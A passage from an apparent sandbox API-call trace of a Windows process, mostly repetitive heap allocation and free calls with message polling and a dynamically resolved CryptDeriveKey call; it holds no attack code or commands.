hHeap=0x25c0000) returned 1 [0199.536] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0199.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24aa0b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.539] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.540] CryptDeriveKey (in: hProv=0xad6260, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0199.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.547] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.547] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 